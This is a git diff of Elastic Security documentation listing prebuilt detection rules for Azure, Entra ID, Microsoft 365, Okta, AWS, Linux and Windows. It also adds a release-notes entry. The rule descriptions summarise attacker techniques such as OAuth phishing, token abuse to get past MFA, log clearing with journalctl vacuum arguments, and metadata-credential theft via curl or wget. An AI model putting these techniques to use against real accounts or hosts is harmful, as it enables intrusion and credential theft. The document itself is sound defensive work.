106 + +|<> | Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. | update | 106 + +|<> | Identifies the deletion of Azure Kubernetes Pods. Adversaries may delete a Kubernetes pod to disrupt the normal behavior of the environment. | update | 106 + +|<> | Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. | update | 106 + +|<> | Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsoft Identity Protection machine learning and heuristics. | update | 108 + +|<> | Identifies a sign-in using the Azure Active Directory PowerShell module. PowerShell for Azure Active Directory allows for managing settings from the command line, which is intended for users who are members of an admin role. | update | 108 + +|<> | Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). | update | 5 + +|<> | Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. | update | 109 + +|<> | Identifies rare occurrences of OAuth workflow for a user principal that is single factor authenticated, with an OAuth scope containing user_impersonation for a token issued by Entra ID. Adversaries may use this scope to gain unauthorized access to user accounts, particularly when the sign-in session status is unbound, indicating that the session is not associated with a specific device or session. This behavior is indicative of potential account compromise or unauthorized access attempts. This rule flags when this pattern is detected for a user principal that has not been seen in the last 10 days, indicating potential abuse or unusual activity. | update | 2 + +|<> | Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. | update | 4 + +|<> | Identifies suspicious activity reported by users in Microsoft Entra ID where users have reported suspicious activity related to their accounts, which may indicate potential compromise or unauthorized access attempts. Reported suspicious activity typically occurs during the authentication process and may involve various authentication methods, such as password resets, account recovery, or multi-factor authentication challenges. Adversaries may attempt to exploit user accounts by leveraging social engineering techniques or other methods to gain unauthorized access to sensitive information or resources. | update | 3 + +|<> | Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user. | update | 218 + +|<> | Detects potentially suspicious OAuth authorization activity in Microsoft Entra ID where the Visual Studio Code first-party application (client_id = aebc6443-996d-45c2-90f0-388ff96faa56) is used to request access to Microsoft Graph resources. While this client ID is legitimately used by Visual Studio Code, threat actors have been observed abusing it in phishing campaigns to make OAuth requests appear trustworthy. These attacks rely on redirect URIs such as VSCode's Insiders redirect location, prompting victims to return an OAuth authorization code that can be exchanged for access tokens. This rule may help identify unauthorized use of the VS Code OAuth flow as part of social engineering or credential phishing activity. | update | 4 + +|<> | Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. | update | 4 + +|<> | Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. | update | 5 + +|<> | Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice avoid creating guest users. Guest users could potentially be overlooked indefinitely leading to a potential vulnerability. | update | 106 + +|<> | Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. | update | 6 + +|<> | This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. | update | 4 + +|<> | Identifies when a new credential is added to an application in Azure. An application may use a certificate or secret string to prove its identity when requesting a token. Multiple certificates and secrets can be added for an application and an adversary may abuse this by creating an additional authentication method to evade defenses or persist in an environment. | update | 106 + +|<> | Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. | update | 106 + +|<> | Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. | update | 106 + +|<> | In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. | update | 106 + +|<> | Identifies an Azure Active Directory (AD) Global Administrator role addition to a Privileged Identity Management (PIM) user account. PIM is a service that enables you to manage, control, and monitor access to important resources in an organization. Users who are assigned to the Global administrator role can read and modify any administrative setting in your Azure AD organization. | update | 106 + +|<> | Azure Active Directory (AD) Privileged Identity Management (PIM) is a service that enables you to manage, control, and monitor access to important resources in an organization. PIM can be used to manage the built-in Azure resource roles such as Global Administrator and Application Administrator. An adversary may add a user to a PIM role in order to maintain persistence in their target's environment or modify a PIM role to weaken their target's security controls. | update | 108 + +|<> | Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. | update | 107 + +|<> | Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Authentication Methods Policy. This behavior may indicate an attempt to federate Entra ID with an attacker-controlled identity provider, enabling bypass of multi-factor authentication (MFA) and unauthorized access through bring-your-own IdP (BYOIDP) methods. | update | 4 + +|<> | Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. | update | 2 + +|<> | Identifies when an Event Hub Authorization Rule is created or updated in Azure. An authorization rule is associated with specific rights, and carries a pair of cryptographic keys. When you create an Event Hubs namespace, a policy rule named RootManageSharedAccessKey is created for the namespace. This has manage permissions for the entire namespace and it's recommended that you treat this rule like an administrative root account and don't use it in your application. | update | 107 + +|<> | Identifies when a user is added as an owner for an Azure application. An adversary may add a user account as an owner for an Azure application in order to grant additional permissions and modify the application's configuration using another account. | update | 106 + +|<> | Identifies when a user is added as an owner for an Azure service principal. The service principal object defines what the application can do in the specific tenant, who can access the application, and what resources the app can access. A service principal object is created when an application is given permission to access resources in a tenant. An adversary may add a user account as an owner for a service principal and use that account in order to define what an application can do in the Azure AD tenant. | update | 106 + +|<> | Identifies the creation of role binding or cluster role bindings. You can assign these roles to Kubernetes subjects (users, groups, or service accounts) with role bindings and cluster role bindings. An adversary who has permissions to create bindings and cluster-bindings in the cluster can create a binding to the cluster-admin ClusterRole or to other high privileges roles. | update | 106 + +|<> | Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. | update | 2 + +|<> | Identifies when a new Inbox forwarding rule is created in Microsoft 365. Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. | update | 210 + +|<> | Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive. | update | 4 + +|<> | Identifies attempts to register a new device in Microsoft Entra ID after OAuth authentication with authorization code grant. Adversaries may use OAuth phishing techniques to obtain an OAuth authorization code, which can then be exchanged for access and refresh tokens. This rule detects a sequence of events where a user principal authenticates via OAuth, followed by a device registration event, indicating potential misuse of the OAuth flow to establish persistence or access resources. | update | 2 + +|<> | Detects a burst of Microsoft 365 user account lockouts within a short 5-minute window. A high number of IdsLocked login errors across multiple user accounts may indicate brute-force attempts for the same users resulting in lockouts. | update | 4 + +|<> | Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token. | update | 211 + +|<> | Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks. | update | 210 + +|<> | Identifies the modification of an anti-phishing rule in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing rules increase this protection by refining settings to better detect and prevent attacks. | update | 210 + +|<> | Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is disabled in Microsoft 365. With DKIM in Microsoft 365, messages that are sent from Exchange Online will be cryptographically signed. This will allow the receiving email system to validate that the messages were generated by a server that the organization authorized and were not spoofed. | update | 210 + +|<> | Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. An adversary may remove a DLP policy to evade existing DLP monitoring. | update | 210 + +|<> | Identifies when a malware filter policy has been deleted in Microsoft 365. A malware filter policy is used to alert administrators that an internal user sent a message that contained malware. This may indicate an account or machine compromise that would need to be investigated. Deletion of a malware filter policy may be done to evade detection. | update | 210 + +|<> | Identifies when a malware filter rule has been deleted or disabled in Microsoft 365. An adversary or insider threat may want to modify a malware filter rule to evade detection. | update | 210 + +|<> | Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attachment rules can extend malware protections to include routing all messages and attachments without a known malware signature to a special hypervisor environment. An adversary or insider threat may disable a safe attachment rule to exfiltrate data or evade defenses. | update | 210 + +|<> | Identifies when a Safe Link policy is disabled in Microsoft 365. Safe Link policies for Office applications extend phishing protection to documents that contain hyperlinks, even after they have been delivered to a user. | update | 210 + +|<> | Detects the occurrence of mailbox audit bypass associations. The mailbox audit is responsible for logging specified mailbox events (like accessing a folder or a message or permanently deleting a message). However, actions taken by some authorized accounts, such as accounts used by third-party tools or accounts used for lawful monitoring, can create a large number of mailbox audit log entries and may not be of interest to your organization. Because of this, administrators can create bypass associations, allowing certain accounts to perform their tasks without being logged. Attackers can abuse this allowlist mechanism to conceal actions taken, as the mailbox audit will log no activity done by the account. | update | 210 + +|<> | Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. | update | 4 + +|<> | Identifies when custom applications are allowed in Microsoft Teams. If an organization requires applications other than those available in the Teams app store, custom applications can be developed as packages and uploaded. An adversary may abuse this behavior to establish persistence in an environment. | update | 211 + +|<> | Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment. | update | 210 + +|<> | Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data. | update | 210 + +|<> | Identifies when a transport rule has been disabled or deleted in Microsoft 365. Mail flow rules (also known as transport rules) are used to identify and take action on messages that flow through your organization. An adversary or insider threat may modify a transport rule to exfiltrate data or evade defenses. | update | 210 + +|<> | Identifies when Microsoft Cloud App Security reports that a user has uploaded files to the cloud that might be infected with ransomware. | update | 210 + +|<> | Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security. | update | 210 + +|<> | Identifies an Microsoft 365 illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources in Microsoft 365. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources in Microsoft 365 on-behalf-of the user. | update | 5 + +|<> | Identifies when a user has been restricted from sending email due to exceeding sending limits of the service policies per the Security Compliance Center. | update | 210 + +|<> | Detects the occurrence of emails reported as Phishing or Malware by Users. Security Awareness training is essential to stay ahead of scammers and threat actors, as security products can be bypassed, and the user can still receive a malicious message. Educating users to report suspicious messages can help identify gaps in security controls and prevent malware infections and Business Email Compromise attacks. | update | 210 + +|<> | Identifies the occurence of files uploaded to OneDrive being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunity to gain initial access to other endpoints in the environment. | update | 210 + +|<> | Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. | update | 210 + +|<> | Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment. | update | 210 + +|<> | Identifies when guest access is enabled in Microsoft Teams. Guest access in Teams allows people outside the organization to access teams and channels. An adversary may enable guest access to maintain persistence in an environment. | update | 210 + +|<> | Identifies a new or modified federation domain, which can be used to create a trust between O365 and an external identity provider. | update | 211 + +|<> | This rule detects when a specific Okta actor has multiple device token hashes for a single Okta session. This may indicate an authenticated session has been hijacked or is being used by multiple devices. Adversaries may hijack a session to gain unauthorized access to Okta admin console, applications, tenants, or other resources. | update | 308 + +|<> | Detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. | update | 207 + +|<> | Detects when a high number of Okta user authentication events are reported for multiple users in a short time frame. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. | update | 207 + +|<> | Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. | update | 207 + +|<> | Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations. | update | 308 + +|<> | This rule identifies potentially malicious processes attempting to access the cloud service provider's instance metadata service (IMDS) API endpoint, which can be used to retrieve sensitive instance-specific information such as instance ID, public IP address, and even temporary security credentials if role's are assumed by that instance. The rule monitors for various tools and scripts like curl, wget, python, and perl that might be used to interact with the metadata API. | update | 7 + +|<> | Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. | update | 215 + +|<> | Detects the creation or modification of files related to the configuration of the dynamic linker on Linux systems. The dynamic linker is a shared library that is used by the Linux kernel to load and execute programs. Attackers may attempt to hijack the execution flow of a program by modifying the dynamic linker configuration files. This technique is often observed by userland rootkits that leverage shared objects to maintain persistence on a compromised host. | update | 7 + +|<> | This rule detects the execution of kill, pkill, and killall commands on Linux systems. These commands are used to terminate processes on a system. Attackers may use these commands to kill security tools or other processes to evade detection or disrupt system operations. | update | 4 + +|<> | This rule detects the creation of the dynamic linker (ld.so). The dynamic linker is used to load shared libraries needed by an executable. Attackers may attempt to replace the dynamic linker with a malicious version to execute arbitrary code. | update | 105 + +|<> | This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. | update | 7 + +|<> | This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. | update | 5 + +|<> | This rule leverages the new_terms rule type to detect file creation via a commonly used file transfer service while excluding typical remote file creation activity. This behavior is often linked to lateral movement, potentially indicating an attacker attempting to move within a network. | update | 4 + +|<> | This rule monitors for (ana)cron jobs being created or renamed. Linux cron jobs are scheduled tasks that can be leveraged by system administrators to set up scheduled tasks, but may be abused by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. | update | 18 + +|<> | This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. | update | 5 + +|<> | Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or executable running from world writable directories or unsigned binaries. This behavior matches on common malware C2 abusing less formal domain names. | update | 3 + +|<> | Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. | update | 4 + +|<> | Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. | update | 214 + +|<> | Identifies the execution of PowerShell with suspicious argument values. This behavior is often observed during malware installation leveraging PowerShell. | update | 209 + +|<> | This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware dropping file notes to different folders. | update | 211 + +|<> | Identifies an unexpected file being modified by dns.exe, the process responsible for Windows DNS Server services, which may indicate activity related to remote code execution or other forms of exploitation. | update | 216 + +|<> | Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. | update | 118 + +|============================================== diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index eb60ce4a69..54b32341fc 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc @@ -13,6 +13,10 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<> | 07 Oct 2025 | 14 | 105 | +This release includes new rules for Windows, Linux and Azure. New rules for Windows include detection for privilege escalation. New rules for Linux include detection for privilege escalation, persistence, credential access, defense evasion and command and control. New rules for Azure include detection for privilege escalation, collection, credential access, initial access and command and control. Additionally, significant rule tuning for Windows, Linux, AWS, Okta and Azure rules has been added for better rule efficacy and performance. + + |<> | 18 Sep 2025 | 1 | 100 | This release includes significant rule tuning for Windows, Linux, Okta and AWS rules for better rule efficacy and performance. @@ -48,3 +52,4 @@ include::downloadable-packages/8-19-4/prebuilt-rules-8-19-4-summary.asciidoc[lev include::downloadable-packages/8-19-5/prebuilt-rules-8-19-5-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-6/prebuilt-rules-8-19-6-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-7/prebuilt-rules-8-19-7-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-19-8/prebuilt-rules-8-19-8-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index c61a377dec..ac5655df77 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc @@ -204,7 +204,7 @@ and their rule type is `machine_learning`. |<> |Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |210 -|<> |Identifies a high number of failed S3 operations from a single source and account (or anonymous account) within a short timeframe. This activity can be indicative of attempting to cause an increase in billing to an account for excessive random operations, cause resource exhaustion, or enumerating bucket names for discovery. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Log Auditing], [Tactic: Impact] |None |5 +|<> |Identifies a high number of failed S3 operations against a single bucket from a single source address within a short timeframe. This activity can indicate attempts to collect bucket objects or cause an increase in billing to an account via internal "AccessDenied" errors. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Log Auditing], [Tactic: Impact], [Tactic: Discovery], [Tactic: Collection] |None |6 |<> |Identifies an expiration lifecycle configuration added to an S3 bucket. Lifecycle configurations can be used to manage objects in a bucket, including setting expiration policies. This rule detects when a lifecycle configuration is added to an S3 bucket, which could indicate that objects in the bucket will be automatically deleted after a specified period of time. This could be used to evade detection by deleting objects that contain evidence of malicious activity. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Tactic: Defense Evasion], [Resources: Investigation Guide] |None |5 @@ -218,7 +218,7 @@ and their rule type is `machine_learning`. |<> |Identifies when object versioning is suspended for an Amazon S3 bucket. Object versioning allows for multiple versions of an object to exist in the same bucket. This allows for easy recovery of deleted or overwritten objects. When object versioning is suspended for a bucket, it could indicate an adversary's attempt to inhibit system recovery following malicious activity. Additionally, when versioning is suspended, buckets can then be deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |5 -|<> |This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Tactic: Impact], [Use Case: Web Application Compromise], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |2 +|<> |This rule detects when a JavaScript file is uploaded or accessed in an S3 static site directory (`static/js/`) by an IAM user or assumed role. This can indicate suspicious modification of web content hosted on S3, such as injecting malicious scripts into a static website frontend. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS S3], [Tactic: Impact], [Use Case: Web Application Compromise], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |3 |<> |Identifies AWS CloudTrail events where an unauthenticated source is attempting to access an S3 bucket. This activity may indicate a misconfigured S3 bucket policy that allows public access to the bucket, potentially exposing sensitive data to unauthorized users. Adversaries can specify --no-sign-request in the AWS CLI to retrieve objects from an S3 bucket without authentication. This is a New Terms rule, which means it will trigger for each unique combination of the source.address and targeted bucket name that has not been seen making this API request. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: Amazon S3], [Use Case: Asset Visibility], [Resources: Investigation Guide], [Tactic: Collection] |None |5 @@ -250,7 +250,7 @@ and their rule type is `machine_learning`. |<> |Identifies when a user or role has assumed a role in AWS Security Token Service (STS). Users can assume a role to obtain temporary credentials and access AWS resources. Adversaries can use this technique for credential access and privilege escalation. This is a New Terms rule that identifies when a service assumes a role in AWS Security Token Service (STS) to obtain temporary credentials and access AWS resources. While often legitimate, adversaries may use this technique for unauthorized access, privilege escalation, or lateral movement within an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Resources: Investigation Guide], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation], [Tactic: Lateral Movement] |None |5 -|<> |Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This rule looks for role chaining activity happening within a single account, to eliminate false positives produced by common cross-account behavior. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |2 +|<> |Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a new terms rule that looks for the first occurance of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS STS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Privilege Escalation], [Tactic: Lateral Movement], [Resources: Investigation Guide] |None |3 |<> |Identifies when a single AWS resource is making `GetServiceQuota` API calls for the EC2 service quota L-1216C47A in more than 10 regions within a 30-second window. Quota code L-1216C47A represents on-demand instances which are used by adversaries to deploy malware and mine cryptocurrency. This could indicate a potential threat actor attempting to discover the AWS infrastructure across multiple regions using compromised credentials or a compromised instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Service Quotas], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |None |4 @@ -336,6 +336,8 @@ and their rule type is `machine_learning`. |<> |Monitors for the deletion of the kernel ring buffer events through dmesg. Attackers may clear kernel ring buffer events to evade detection after installing a Linux kernel module (LKM). |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |109 +|<> |This rule monitors for attempts to clear logs using the "journalctl" command on Linux systems. Adversaries may use this technique to cover their tracks by deleting or truncating log files, making it harder for defenders to investigate their activities. The rule looks for the execution of "journalctl" with arguments that indicate log clearing actions, such as "--vacuum-time", "--vacuum-size", or "--vacuum-files". |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Auditd Manager], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 + |<> |Detects attempts to create an Okta API token. An adversary may create an Okta API token to maintain access to an organization's network while they work to achieve their objectives. An attacker may abuse an API token to execute techniques such as creating user accounts or disabling security rules or policies. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence], [Resources: Investigation Guide] |None |412 |<> |Detects attempts to deactivate an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact], [Resources: Investigation Guide] |None |413 @@ -360,7 +362,7 @@ and their rule type is `machine_learning`. |<> |Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |113 -|<> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |214 +|<> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |215 |<> |Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |110 @@ -396,67 +398,71 @@ and their rule type is `machine_learning`. |<> |Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon. |[Domain: Endpoint], [OS: macOS], [Use Case: 